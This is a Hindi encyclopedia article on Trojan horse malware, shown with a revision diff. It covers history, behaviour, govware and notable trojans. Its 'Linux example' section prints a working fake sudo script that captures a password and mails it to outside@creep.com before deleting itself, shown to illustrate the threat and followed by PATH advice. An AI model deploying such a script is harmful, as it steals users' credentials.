ट्रोजन हॉर्स (कंप्यूटिंग): Difference between revisions

From Vigyanwiki
No edit summary
No edit summary
Line 11: Line 11:
ट्रोजन आमतौर पर [[सोशल इंजीनियरिंग (सुरक्षा)|सामाजिक अभियान्त्रिकी]] के किसी रूप के माध्यम से फैलते हैं; उदाहरण के लिए, जहाँ एक उपयोगकर्ता को सहज दिखने के लिए एक [[ईमेल|इमेल]] संबद्धता  निष्पादित करने में धोखा दिया जाता है (उदाहरण के लिए, एक नियमित फॉर्म भरने के लिए), या सामाजिक संचार माध्यम पर या अन्य जगहों पर एक नकली विज्ञापन पर क्लिक करके। हालांकि उनका पेलोड कुछ भी हो सकता है, कई आधुनिक रूप [[पिछले दरवाजे (कंप्यूटिंग)|गुप्तद्वार]] के रूप में कार्य करते हैं ,एक नियंत्रक से संपर्क करते हैं जो प्रभावित परिकलक पर  अनाधिकृत पहुंच प्राप्त कर सकते हैं।<ref>{{cite web |title=वायरस, वर्म और ट्रोजन के बीच अंतर|url=https://knowledge.broadcom.com/external/article?legacyId=tech98539 |website=Symantec Security Center |publisher=Broadcom Inc. |access-date=2020-03-29 |archive-url=https://archive.today/20130819122702/http://www.symantec.com/business/support/index?page=content&id=TECH98539#selection-3435.1-3585.1 |archive-date=2013-08-19 |url-status=live}}</ref> [[रैंसमवेयर]] हमले अक्सर ट्रोजन का उपयोग करके किए जाते हैं।  
ट्रोजन आमतौर पर [[सोशल इंजीनियरिंग (सुरक्षा)|सामाजिक अभियान्त्रिकी]] के किसी रूप के माध्यम से फैलते हैं; उदाहरण के लिए, जहाँ एक उपयोगकर्ता को सहज दिखने के लिए एक [[ईमेल|इमेल]] संबद्धता  निष्पादित करने में धोखा दिया जाता है (उदाहरण के लिए, एक नियमित फॉर्म भरने के लिए), या सामाजिक संचार माध्यम पर या अन्य जगहों पर एक नकली विज्ञापन पर क्लिक करके। हालांकि उनका पेलोड कुछ भी हो सकता है, कई आधुनिक रूप [[पिछले दरवाजे (कंप्यूटिंग)|गुप्तद्वार]] के रूप में कार्य करते हैं ,एक नियंत्रक से संपर्क करते हैं जो प्रभावित परिकलक पर  अनाधिकृत पहुंच प्राप्त कर सकते हैं।<ref>{{cite web |title=वायरस, वर्म और ट्रोजन के बीच अंतर|url=https://knowledge.broadcom.com/external/article?legacyId=tech98539 |website=Symantec Security Center |publisher=Broadcom Inc. |access-date=2020-03-29 |archive-url=https://archive.today/20130819122702/http://www.symantec.com/business/support/index?page=content&id=TECH98539#selection-3435.1-3585.1 |archive-date=2013-08-19 |url-status=live}}</ref> [[रैंसमवेयर]] हमले अक्सर ट्रोजन का उपयोग करके किए जाते हैं।  


[[कंप्यूटर वायरस|परिकलक विषाणु]] और [[कंप्यूटर कीड़ा|कृमि]] के विपरीत, ट्रोजन आमतौर पर खुद को अन्य दस्तावेजों में नवीनता करने की कोशिश नहीं करते हैं या अन्यथा खुद को प्रचारित नहीं करते हैं।<ref>{{Cite web| title = वायरस-एल/कंप.वायरस अक्सर पूछे जाने वाले प्रश्न (एफएक्यू) v2.00 (प्रश्न बी3: ट्रोजन हॉर्स क्या है?)| url = http://faqs.cs.uu.nl/na-dir/computer-virus/faq.html| date = October 9, 1995| access-date = September 16, 2019| archive-date = August 5, 2020
[[कंप्यूटर वायरस|परिकलक वायरस]] और [[कंप्यूटर कीड़ा|वर्म्स]] के विपरीत, ट्रोजन आमतौर पर खुद को अन्य दस्तावेजों में इंजेक्ट करने की कोशिश नहीं करते हैं या अन्यथा खुद को प्रचारित नहीं करते हैं।<ref>{{Cite web| title = वायरस-एल/कंप.वायरस अक्सर पूछे जाने वाले प्रश्न (एफएक्यू) v2.00 (प्रश्न बी3: ट्रोजन हॉर्स क्या है?)| url = http://faqs.cs.uu.nl/na-dir/computer-virus/faq.html| date = October 9, 1995| access-date = September 16, 2019| archive-date = August 5, 2020
|archive-url = https://web.archive.org/web/20200805171304/https://faqs.cs.uu.nl/na-dir/computer-virus/faq.html
|archive-url = https://web.archive.org/web/20200805171304/https://faqs.cs.uu.nl/na-dir/computer-virus/faq.html
|url-status = dead}}</ref>
|url-status = dead}}</ref>

Revision as of 20:06, 21 March 2023

संगणना में, एक ट्रोजन हॉर्स कोई भी मैलवेयर है जो उपयोगकर्ताओं को उसके वास्तविक इरादे के बारे में गुमराह करता है। यह शब्द भ्रामक ट्रोजन हॉर्स की प्राचीन ग्रीक कहानी से लिया गया है ,जिसके कारण ट्रॉय शहर का पतन हुआ।[1][2][3][4][5]

ट्रोजन आमतौर पर सामाजिक अभियान्त्रिकी के किसी रूप के माध्यम से फैलते हैं; उदाहरण के लिए, जहाँ एक उपयोगकर्ता को सहज दिखने के लिए एक इमेल संबद्धता निष्पादित करने में धोखा दिया जाता है (उदाहरण के लिए, एक नियमित फॉर्म भरने के लिए), या सामाजिक संचार माध्यम पर या अन्य जगहों पर एक नकली विज्ञापन पर क्लिक करके। हालांकि उनका पेलोड कुछ भी हो सकता है, कई आधुनिक रूप गुप्तद्वार के रूप में कार्य करते हैं ,एक नियंत्रक से संपर्क करते हैं जो प्रभावित परिकलक पर अनाधिकृत पहुंच प्राप्त कर सकते हैं।[6] रैंसमवेयर हमले अक्सर ट्रोजन का उपयोग करके किए जाते हैं।

परिकलक वायरस और वर्म्स के विपरीत, ट्रोजन आमतौर पर खुद को अन्य दस्तावेजों में इंजेक्ट करने की कोशिश नहीं करते हैं या अन्यथा खुद को प्रचारित नहीं करते हैं।[7]


शब्द का प्रयोग

यह स्पष्ट नहीं है कि कब और कहाँ अवधारणा, और इसके लिए शब्द का पहली बार उपयोग किया गया था,लेकिन 1971 तक पहले यूनिक्स पुस्तिका ने मान लिया था कि इसके पाठक दोनों को जानते हैं:[8]

साथ ही, अटल-उपभोगकर्ता-आईडी थोड़ा चालू करने के साथ दस्तावेज के स्वामी को नहीं बदल सकता है, अन्यथा कोई अन्य दस्तावेजों का दुरुपयोग करने में सक्षम ट्रोजन हॉर्स बना सकता है।

एक और प्रारंभिक संदर्भ 1974 में मॉलटिक्स परिकलक प्रणाली में भेद्यता विश्लेषण पर अमेरिकी वायु सेना के विवरण में है।[9]

इसे केन थॉम्पसन द्वारा 1983 के अपने ट्यूरिंग पुरस्कार स्वीकृति व्याख्यान "विश्वासी न्यास पर परावर्तन" में लोकप्रिय बनाया गया था।[10] उपशीर्षक: किस हद तक एक बयान पर भरोसा करना चाहिए कि एक कार्यक्रम ट्रोजन हॉर्स से मुक्त है?

प्रक्रिया सामग्री लिखने वाले लोगों पर भरोसा करना शायद अधिक महत्वपूर्ण है। उन्होंने उल्लेख किया कि वे मालटिक्स की सुरक्षा पर एक विवरण से ट्रोजन के संभावित अस्तित्व के बारे में जानते थे।[11][12]



व्यवहार

एक बार अधिष्ठापित हो जाने पर, ट्रोजन विभिन्न प्रकार के दुर्भावनापूर्ण कार्य कर सकते हैं। कई अंतर्जाल पर एक या अधिक आदेश और संयम (C2) परिसेवक से संपर्क करते हैं और निर्देशो का इन्तजार करते हैं। चूंकि व्यक्तिगत ट्रोजन आमतौर पर इस संचार के लिए बंदरगाहों के एक विशिष्ट समुच्चय का उपयोग करते हैं, इसलिए उनका पता लगाना अपेक्षाकृत सरल हो सकता है। इसके अलावा, अन्य मैलवेयर संभावित रूप से दुर्भावनापूर्ण गतिविधि के लिए प्रतिनिधि के रूप में ट्रोजन का "अधिकार" कर सकते हैं।

जर्मन भाषी देशों में, सरकार द्वारा उपयोग किए जाने वाले या बनाए गए जासूसी के सोफ्टवेयर को कभी-कभी गोववेयर कहा जाता है। गोववेयर आमतौर पर एक ट्रोजन प्रक्रिया सामाग्री है जिसका उपयोग लक्ष्य परिकलक से संचार को बाधित करने के लिए किया जाता है। स्विट्ज़रलैंड और जर्मनी के जैसे कुछ देशों में ऐसे प्रक्रियात्मक सामाग्री के उपयोग को नियंत्रित करने वाला एक कानूनी ढांचा है।[13][14] गोववेयर ट्रोजन के उदाहरणों में स्विस मिनीपैंजर और मेगापैंजर [15] और जर्मन "राज्य ट्रोजन" उपनाम R2D2 शामिल है। [13]जर्मन गोववेयर आम जनता के लिए अज्ञात सुरक्षा अंतराल का शोषण करके और अन्य अनुप्रयोगों के माध्यम से कूट किए जाने से पहले स्मार्टफोन डेटा तक पहुंचने का काम करता है। [16]

विच्छेदको के बीच बोटनेट की लोकप्रियता और विज्ञापन सेवाओं की उपलब्धता के कारण, जो लेखकों को अपने उपयोगकर्ताओं की गोपनीयता का उल्लंघन करने की अनुमति देते हैं, ट्रोजन अधिक आम होते जा रहे हैं। बिटडिफेंडर द्वारा जनवरी से जून 2009 तक किए गए एक सर्वेक्षण के अनुसार, "ट्रोजन-प्रकार के मैलवेयर बढ़ रहे हैं, जो दुनिया में पाए गए वैश्विक मैलवेयर का 83% हिस्सा हैै"। ट्रोजन का कीड़ों से संबंध है, क्योंकि वे कीड़ों की मदद से फैलते हैं और उनके साथ अंतर्जाल पर यात्रा करते हैं।[17] बिटडिफेंडर ने कहा है कि लगभग 15% परिकलक एक बॉटनेट के सदस्य हैं, जो आमतौर पर ट्रोजन संक्रमणों द्वारा भर्ती किए जाते हैं।[18]


लिनक्स उदाहरण

ट्रोजन हॉर्स एक ऐसी योजना है जो कुछ स्पष्ट कार्य करने का दावा करती है, फिर भी निष्पादन पर यह उपयोगकर्ता की सुरक्षा से समझौता करती है।[19] एक आसान योजना लिनक्स सुडो आदेश का नया संस्करण है। आदेश को तब सार्वजनिक रूप से लिखने योग्य निर्देशिका जैसे /tmpमें अनुकृति किया जाता है। यदि कोई व्यवस्थापक उस निर्देशिका में होता है और sudo निष्पादित करता है, तो ट्रोजन हॉर्स को निष्पादित किया जा सकता है। यहाँ एक कार्यशील संस्करण है:

:
# sudo
# ----

# Turn off the character echo to the screen.
stty -echo

/bin/echo -n "Password for `whoami`: "
read x
/bin/echo ""

# Turn back on the character echo.
stty echo

echo $x | mail -s "`whoami` password" outside@creep.com
sleep 1
echo Sorry.
rm $0

exit 0

आदेश प्रणाली आधारित ट्रोजन हॉर्सेस को रोकने के लिए, पथ प्रविष्टि= पर्यावरण चर पूंछ के अंत में स्थित होना चाहिए। उदाहरण के लिए: PATH=/usr/local/bin:/usr/bin:..

उल्लेखनीय उदाहरण

निजी और सरकारी

सार्वजनिक रूप से उपलब्ध

  • ईजीएबीटीआर - 1980 के दशक के अंत में
  • नेटबस - 1998 (प्रकाशित)[20]
  • मोबमैन द्वारा प्रभात - 1999 (प्रकाशित)
  • पीछे का छिद्र - 1998 (प्रकाशित)
  • बीस्ट (ट्रोजन हॉर्स) - 2002 (प्रकाशित)
  • बिफ्रोस्ट (ट्रोजन हॉर्स) - 2004 (प्रकाशित)
  • डार्ककॉमेट - 2008-2012 (प्रकाशित)
  • ब्लैकहोल शोषण किट - 2012 (प्रकाशित)
  • घोस्ट आरएटी - 2009 (प्रकाशित)
  • मिनीपैंजर और मेगापैंजर - 2009 (प्रकाशित)[21][22]
  • Leurak द्वारा MEMZ - 2016 (प्रकाशित)

सुरक्षा शोधकर्ताओं द्वारा पता लगाया

  • बारह टोटके - 1990
  • क्लिकबॉट.ए - 2006 (खोजा गया)
  • ज़्यूस (ट्रोजन हॉर्स) - 2007 (खोजा गया)
  • ट्रोजन बैकडोर। फ्लैशबैक - 2011 (खोजा गया)
  • ज़ीरो एक्सेस बॉटनेट - 2011 (खोजा गया)
  • कोबफेस - 2008 (खोजा गया)
  • चोट - 2009 (खोजा गया)
  • कोरफ्लड - 2010 (खोजा गया)
  • टिनी बैंकर ट्रोजन - 2012 (खोजा गया)
  • सोवा - 2022 (खोजा गया)[23]
  • गवाह एंड्रॉइड मैलवेयर - 2015 (खोजा गया)[24][25]Cite error: Closing </ref> missing for <ref> tag[26][27]


पूंजीकरण

परिकलक शब्द "ट्रोजन हॉर्स" प्राचीन शहर ट्रॉय के प्रसिद्ध ट्रोजन हॉर्स से लिया गया है। इस कारण "ट्रोजन" को अक्सर पूंजीकृत किया जाता है। हालाँकि, जबकि शैली निर्देश और शब्दकोश अलग-अलग होते हैं, कई लोग सामान्य उपयोग के लिए छोटे अक्षर "ट्रोजन" का सुझाव देते हैं।[28][29]


यह भी देखें

संदर्भ

  1. Landwehr, Carl E.; Alan R. Bull; John P. McDermott; William S. Choi (1993). कंप्यूटर प्रोग्राम सुरक्षा दोषों का एक वर्गीकरण, उदाहरण के साथ (PDF). DTIC Document. CiteSeerX 10.1.1.35.997. Archived from the original on April 8, 2013. Retrieved 2012-04-05.
  2. "ट्रोजन हॉर्स परिभाषा". Retrieved 2012-04-05.
  3. "ट्रोजन हॉर्स". Webopedia. Retrieved 2012-04-05.
  4. "ट्रोजन हॉर्स क्या है? - Whatis.com से परिभाषा". Retrieved 2012-04-05.
  5. "ट्रोजन हॉर्स: [एमआईटी-हैकर-टर्न-एनएसए-स्पूक डैन एडवर्ड्स द्वारा गढ़ा गया] एन।". Retrieved 2012-04-05.
  6. "वायरस, वर्म और ट्रोजन के बीच अंतर". Symantec Security Center. Broadcom Inc. Archived from the original on 2013-08-19. Retrieved 2020-03-29.
  7. "वायरस-एल/कंप.वायरस अक्सर पूछे जाने वाले प्रश्न (एफएक्यू) v2.00 (प्रश्न बी3: ट्रोजन हॉर्स क्या है?)". October 9, 1995. Archived from the original on August 5, 2020. Retrieved September 16, 2019.
  8. Thompson, Ken; Ritchie, Dennis M. "यूनिक्स प्रोग्रामर मैनुअल, 3 नवम्बर 1971" (PDF). Retrieved 28 March 2020.
  9. Karger, P.A.; Schell, R.R., "Multics Security Evaluation: Vulnerability Analysis , ESD-TR-74-193" (PDF), HQ Electronic Systems Division: Hanscom AFB, MA, II
  10. Ken Thompson (1984). "ट्रस्टिंग ट्रस्ट पर प्रतिबिंब". Commun. ACM. 27 (8): 761–763. doi:10.1145/358198.358210..
  11. Paul A. Karger; Roger R. Schell (2002), "Thirty Years Later: Lessons from the Multics Security Evaluation" (PDF), ACSAC: 119–126
  12. Karger et Schell wrote that Thompson added this reference in a later version of his Turing conference: Ken Thompson (November 1989), "On Trusting Trust.", Unix Review, 7 (11): 70–74
  13. 13.0 13.1 Basil Cupa, Trojan Horse Resurrected: On the Legality of the Use of Government Spyware (Govware), LISS 2013, pp. 419–428
  14. "अधिकतर पूछे जाने वाले सवाल". Federal Department of Justice and Police. Archived from the original on May 6, 2013.
  15. Dunn, John (27 August 2009). "स्विस कोडर सरकारी जासूस ट्रोजन का प्रचार करता है". TechWorld. Archived from the original on 26 January 2014. Retrieved 10 January 2021.
  16. "जर्मन संघीय पुलिस फोन एन्क्रिप्शन से बचने के लिए ट्रोजन वायरस का उपयोग करती है". DW. Retrieved 2018-04-14.
  17. "बिटडिफेंडर मालवेयर और स्पैम सर्वेक्षण ई-खतरे को ऑनलाइन व्यवहार प्रवृत्तियों के अनुकूल पाता है". BitDefender. Archived from the original on 2009-08-08. Retrieved 2020-03-27.
  18. Datta, Ganesh (2014-08-07). "ट्रोजन क्या होते हैं?". SecurAid. Archived from the original on 2014-08-12. Retrieved 2020-03-27.
  19. Wood, Patrick H.; Kochan, Stephen G. (1985). यूनिक्स प्रणाली सुरक्षा. Hayden Books. p. 42. ISBN 0-8104-6267-2.
  20. Seth, Kulakow (1998). "क्या यह अभी भी एक ट्रोजन हॉर्स या वास्तविक वैध रिमोट कंट्रोल एडमिनिस्ट्रेशन टूल है?" (Report). SANS Institute. Retrieved 2021-05-10.
  21. "मेगा पैंजर". SourceForge.
  22. "मिनी टैंक". SourceForge.
  23. "सोवा वायरस क्या है?". India Today.
  24. "ट्रोजनाइज्ड एडवेयर परिवार जो भी ऐप चाहता है उसे इंस्टॉल करने के लिए एक्सेसिबिलिटी सेवा का दुरुपयोग करता है - लुकआउट ब्लॉग".
  25. Neal, Dave (2015-11-20). "शेडुन ट्रोजन एडवेयर एंड्रॉइड एक्सेसिबिलिटी सर्विस को हिट कर रहा है". The Inquirer. Incisive Business Media. Archived from the original on 2015-11-22. Retrieved 2020-03-27.{{cite web}}: CS1 maint: unfit URL (link)
  26. Times, Tech (November 9, 2015). "एंड्रॉइड मालवेयर का नया परिवार हटाना वस्तुतः असंभव है: शेडुन, शुएनेट और शिफ्टीबग को नमस्ते कहें".
  27. "एंड्रॉइड एडवेयर खुद को तब भी इंस्टॉल कर सकता है जब उपयोगकर्ता स्पष्ट रूप से इसे अस्वीकार कर दें". 2015-11-19.
  28. "ट्रोजन". Collins Advanced Dictionary. Retrieved 29 March 2020.
  29. "ट्रोजन हॉर्स". Microsoft Style Guide. Microsoft. Retrieved 29 March 2020.

बाहरी संबंध